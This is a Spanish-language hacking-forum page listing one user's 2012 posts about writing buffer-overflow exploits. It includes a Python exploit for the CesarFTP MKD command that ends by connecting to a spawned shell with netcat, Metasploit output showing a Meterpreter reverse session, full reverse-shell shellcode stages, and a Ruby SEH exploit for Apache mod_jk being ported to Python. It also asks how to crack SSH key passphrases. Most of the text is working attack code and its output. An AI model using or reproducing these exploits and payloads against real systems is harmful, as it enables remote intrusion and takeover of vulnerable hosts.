No hay nada que hacer? Alguna herramienta tipo medusa que teste cada passphrase?
Gracias.
Gracias.
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#2
Bugs y Exploits / Duda en codigo ruby Metasploit
15 Abril 2012, 23:58 PM
Buenas, aquí esta el codigo:
http://www.exploit-db.com/exploits/16798/
Mi duda es esta
Estoy tratando de pasarlo a python, las líneas que no se interpretar son las siguientes:
Como seguirías este buffer?
Gracias chicos!!
http://www.exploit-db.com/exploits/16798/
Mi duda es esta
Código [Seleccionar]
def exploit
connect
uri_start = "GET /"
uri_end = ".html HTTP/1.0\r\n\r\n"
sc_base = 16
shellcode = payload.encoded
sploit = rand_text_alphanumeric(5001)
sploit[sc_base, shellcode.length] = shellcode
# 4343 : Apache/1.3.37 (Win32) mod_jk/1.2.20
# 4407 : Apache/2.0.59 (Win32) mod_jk/1.2.20
# 4423 : Apache/2.2.3 (Win32) mod_jk/1.2.20
[ 4343, 4407, 4423 ].each { |seh_offset|
sploit[seh_offset - 9, 5] = "\xe9" + [sc_base - seh_offset + 4].pack('V')
sploit[seh_offset - 4, 2] = "\xeb\xf9"
sploit[seh_offset , 4] = [ target.ret ].pack('V')
}
Estoy tratando de pasarlo a python, las líneas que no se interpretar son las siguientes:
Código [Seleccionar]
sploit[sc_base, shellcode.length] = shellcode
sploit[seh_offset - 9, 5] = "\xe9" + [sc_base - seh_offset + 4].pack('V')
sploit[seh_offset - 4, 2] = "\xeb\xf9"
sploit[seh_offset , 4] = [ target.ret ].pack('V')
Como seguirías este buffer?
Código [Seleccionar]
Buffer = "GET /"
Buffer += '\x41' * 5001
Buffer += ????
Buffer += ????
[...]
Buffer += ".html HTTP/1.0\r\n\r\n"
Gracias chicos!!
#3
Criptografía / Claves RSA y DSA, maldita passphrase!!
15 Abril 2012, 23:46 PM
Buenas chicos, os pongo un escenario.
Un pc atacante
Un pc destino con un servicio ssh.
A dicho servidor es posible obtener con nmap tanto RSA como DSA,
Bien, si al extraer los dos y lanzarlos con la opción -i, en lugar de la clave de siempre pide un passphrase, alguien sabe como descifrar este tema?
Gracias!!
Un pc atacante
Un pc destino con un servicio ssh.
A dicho servidor es posible obtener con nmap tanto RSA como DSA,
Bien, si al extraer los dos y lanzarlos con la opción -i, en lugar de la clave de siempre pide un passphrase, alguien sabe como descifrar este tema?
Gracias!!
#4
Bugs y Exploits / Re: Necesito ayuda urgente, buffer overflow.
4 Marzo 2012, 00:17 AM
Olvide comentarte que no quería usar la plataforma msf, msfpayload y encoder si pero no el multi/handler,
Hay un espacio de 339 bytes para alojar la shellcode.
He usado una shellcode que encontré por ahí y la encodee filtrando una cadena larga de badchars que vi en una beta del modulo ruby de metasploit la cual no se porque no esta en el modulo residente.
También he podido comprobar que el modulo del exploit de msf no funciona siempre, algunas veces rompe la pila, reiniciando el server en el debugger un par de veces volvía a funcionar como es debido.
He creado otro hilo en programación Python para añadir la ejecución de netcat al final del script, en este lenguaje soy un iniciado y de momento no tengo soltura
Hay un espacio de 339 bytes para alojar la shellcode.
He usado una shellcode que encontré por ahí y la encodee filtrando una cadena larga de badchars que vi en una beta del modulo ruby de metasploit la cual no se porque no esta en el modulo residente.
También he podido comprobar que el modulo del exploit de msf no funciona siempre, algunas veces rompe la pila, reiniciando el server en el debugger un par de veces volvía a funcionar como es debido.
He creado otro hilo en programación Python para añadir la ejecución de netcat al final del script, en este lenguaje soy un iniciado y de momento no tengo soltura
#5
Scripting / [PYTHON] Ejecutar commando despues de un socket
3 Marzo 2012, 19:14 PM
Buenas, estoy intentando integrar un comando en bash dentro de un script de python para lanzar un netcat
Esto funciona.
pero quiero meterlo despues de un exploit y el codigo no llega a ejecutarse
cuando lo ejecuto en la consola hace su cometido, pero no llega a la parte final.
Por lo que en otra ventana he de ir y arrancar netcat
Me hechais un cablecillo??
Esto funciona.
Código [Seleccionar]
#!/usr/bin/python
import os
os.system("nc 192.168.0.4 28876 -vvv")pero quiero meterlo despues de un exploit y el codigo no llega a ejecutarse
Código [Seleccionar]
#!/usr/bin/python
import socket
import sys
import os
[...]
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.0.4',21))
s.recv(1024)
s.send('USER ftp\r\n')
s.recv(1024)
s.send('PASS ftp\r\n')
s.recv(1024)
s.send('MKD ' + buf + '\r\n')
print "[*] Sending BufferOverflow..."
print "[*]" , (len(buf)) , "bytes Evil code"
print "[*] Starting connection backdoor port 28876"
s.recv(1024)
s.send('QUIT\r\n')
s.close()
sleep(5)
print "[*] Spawning Shell"
os.system("nc 192.168.0.4 28876 -vvv")cuando lo ejecuto en la consola hace su cometido, pero no llega a la parte final.
Código [Seleccionar]
[*] Sending BufferOverflow...
[*] 1017 bytes Evil code
[*] Starting connection backdoor port 28876
Por lo que en otra ventana he de ir y arrancar netcat
Código [Seleccionar]
root@bt:~/Desktop# nc 192.168.0.4 28876
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\>Me hechais un cablecillo??
#6
Bugs y Exploits / Re: Necesito ayuda urgente, buffer overflow.
3 Marzo 2012, 19:03 PM
Bueno ya he logrado que funcione, el problema son las badchars que no son las que hay que poner, y luego la longitud del Nopsleed tampoco es la que pone en el modulo.
en metasploit funciona porque la shellcode que usa esta creada para esos badchars, si queremos usar cualquier otra hay que poner bastantes mas badchars para el encoder al igual que los nops.
con esta info el que quiera puede solucionarlo
Gracias Ivanchuk por todo, aunque me he adelantado XDD
en metasploit funciona porque la shellcode que usa esta creada para esos badchars, si queremos usar cualquier otra hay que poner bastantes mas badchars para el encoder al igual que los nops.
con esta info el que quiera puede solucionarlo
Gracias Ivanchuk por todo, aunque me he adelantado XDD
#7
Bugs y Exploits / Re: Getgui falla
3 Marzo 2012, 00:12 AM
meterpreter > getuid
Server username: SUPPORT001\nemesis
estoy es lo mas cerca de tu problema
Server username: SUPPORT001\nemesis
estoy es lo mas cerca de tu problema
#8
Bugs y Exploits / Re: Necesito ayuda urgente, buffer overflow.
3 Marzo 2012, 00:03 AM
Te cuento lo que acabo de investigar...
como no hay manera de hacer funcionar el script, he modificado un poco el modulo ruby de metasploit, cambiado los siguientes valores
por esto otro.
y he obtenido el siguiente resultado.
Luego por interpretacion propia pienso que:
Que no entiendo... pues basicamente, si yo en BT ejecuto el siguiente comando:
Me devuelve dos codigos.
Ya mas no alcanzo... si quieres que haga algo lo hago encantado Ivanchuk.
Un saludo.
como no hay manera de hacer funcionar el script, he modificado un poco el modulo ruby de metasploit, cambiado los siguientes valores
Código [Seleccionar]
root@bt:~/Desktop/cesar# msfcli exploit/windows/ftp/cesarftp_mkd RHOST=192.168.11.15 FTPPASS=ftp FTPUSER=ftp E
[*] Please wait while we load the module tree...
RHOST => 192.168.11.15
FTPPASS => ftp
FTPUSER => ftp
[*] Started reverse handler on 192.168.10.195:4444
[*] Trying target Windows RockHounD...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (752128 bytes) to 192.168.11.15
[*] Meterpreter session 1 opened (192.168.10.195:4444 -> 192.168.11.15:1115) at 2012-03-02 23:48:17 +0100
meterpreter > exit
[*] Shutting down Meterpreter...
[*] Meterpreter session 1 closed. Reason: User exitCódigo [Seleccionar]
sploit = "\n" * 671 + rand_text_english(3, payload_badchars)
sploit << [target.ret].pack('V') + make_nops(40) + payload.encoded + "\r\n"
por esto otro.
Código [Seleccionar]
sploit = "\n" * 671 + "AAA"
sploit << [target.ret].pack('V') + "\x90" * 40 + "\xcc\xcc\xcc\xcc" + payload.encoded + "\xcc\xcc\xcc\xcc" + "\r\n"
y he obtenido el siguiente resultado.
Código [Seleccionar]
00B0EE40 350A0D2D -..5 #buffer "\n" * 671
00B0EE44 0D2D3035 50-. #buffer "\n" * 671
00B0EE48 3035350A .550 #buffer "\n" * 671
00B0EE4C 41414120 AAA # "AAA"
00B0EE50 77D5AA01 ªÕw USER32.77D5AA01 # SALTO A JMP ESP
00B0EE54 90909090 # Nops
00B0EE58 90909090 # Nops
00B0EE5C 90909090 # Nops
00B0EE60 90909090 # Nops
00B0EE64 90909090 # Nops
00B0EE68 90909090 # Nops
00B0EE6C 90909090 # Nops
00B0EE70 90909090 # Nops
00B0EE74 90909090 # Nops
00B0EE78 90909090 # Nops
00B0EE7C D42AFD03 ý*Ô # Shellcode
00B0EE80 E011737F sà # Shellcode
00B0EE84 7F4B782F /xK # Shellcode
00B0EE88 D50B7A14 z
Õ # Shellcode
00B0EE8C 7D157BB7 ·{} SHELL32.7D157BB7 # Shellcode #Esto no estara llamando a algun lado?
00B0EE90 72B4B043 C°´r # Shellcode
00B0EE94 7C679246 F'g| # Shellcode
00B0EE98 4E76F510 õvN # Shellcode
00B0EE9C 32751D77 w
u2 # Shellcode
00B0EEA0 9F4FEBF7 ֑O٠# Shellcode
00B0EEA4 7443E3B4 ´ãCt # Shellcode
00B0EEA8 C0A92C2F /,©À # Shellcode
00B0EEAC E13070F8 øp0á # Shellcode
..... etc
Luego por interpretacion propia pienso que:
Código [Seleccionar]
[*] Started reverse handler on 192.168.10.195:4444 # Monta el listening en el 4444 local
[*] Trying target Windows RockHounD...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes) # manda la shellcode
[*] Sending stage (752128 bytes) to 192.168.11.15 # Manda el payload meterpreter pero ya habiendo conectado con el handler
Que no entiendo... pues basicamente, si yo en BT ejecuto el siguiente comando:
Código [Seleccionar]
root@bt:~/Desktop/cesar# msfpayload windows/shell/reverse_ord_tcp LHOST="192.168.10.195" EXITFUNC=process PMe devuelve dos codigos.
Código [Seleccionar]
# windows/shell/reverse_ord_tcp - 93 bytes (stage 1)
# http://www.metasploit.com
# VERBOSE=false, LHOST=192.168.10.195, LPORT=4444,
# ReverseConnectRetries=5, EXITFUNC=process,
# InitialAutoRunScript=, AutoRunScript=
my $buf =
"\xfc\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x50\x1c\x8b" .
"\x12\x8b\x72\x20\xad\xad\x4e\x03\x06\x3d\x32\x33\x5f\x32" .
"\x75\xef\x8b\x6a\x08\x8b\x45\x3c\x8b\x4c\x05\x78\x8b\x4c" .
"\x0d\x1c\x01\xe9\x8b\x41\x58\x01\xe8\x8b\x71\x3c\x01\xee" .
"\x03\x69\x0c\x53\x6a\x01\x6a\x02\xff\xd0\x97\x68\xc0\xa8" .
"\x0a\xc3\x68\x02\x00\x11\x5c\x89\xe1\x53\xb7\x0c\x53\x51" .
"\x57\x51\x6a\x10\x51\x57\x56\xff\xe5"
# windows/shell/reverse_ord_tcp - 240 bytes (stage 2)
# http://www.metasploit.com
my $buf =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" .
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" .
"\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" .
"\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" .
"\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" .
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" .
"\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" .
"\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" .
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" .
"\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" .
"\x12\xeb\x86\x5d\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" .
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01" .
"\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" .
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89" .
"\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb" .
"\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" .
"\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" .
"\xff\xd5"
Ya mas no alcanzo... si quieres que haga algo lo hago encantado Ivanchuk.
Un saludo.
#9
Bugs y Exploits / Re: Necesito ayuda urgente, buffer overflow.
2 Marzo 2012, 14:20 PMCitarProbe el exploit y funciona terriblemente bien con msf. Despues si hago algo de tiempo me fijo con tu script.
Hola ivanchuk, con msf funciona a la perfección es lo que no comprendo, debe ser tema de la shellcode porque yo creo que el script Python esta bien escrito, he probado otros exploits en otros lenguajes y el efecto es el mismo, no crea nada y se queda como parado, cuando con msf lo lanzo va de lujo.
Espero que tengas un hueco para echarme una mano.
Cuando extraje los dos stagers de msfpayload los intente incluir en el exploit de esta manera
Código [Seleccionar]
buffer = "MKD "
buffer += "\n" * 671
buffer += "A" * 3
buffer += eip
buffer += "\x90" * 40
buffer += stage1
buffer += stage2
buffer += "\r\n"Evidentemente mi invención no funciono
#10
Bugs y Exploits / [DUDA] Immunity Debugger
28 Febrero 2012, 12:50 PM
Buenas, cuando tengo un proceso dentro del debugger y mando mi exploit, me sale el mensaje
Debug string: AnswerHandler called y asi se queda todo el rato.
alguien sabe que estoy haciendo mal?
Debug string: AnswerHandler called y asi se queda todo el rato.
alguien sabe que estoy haciendo mal?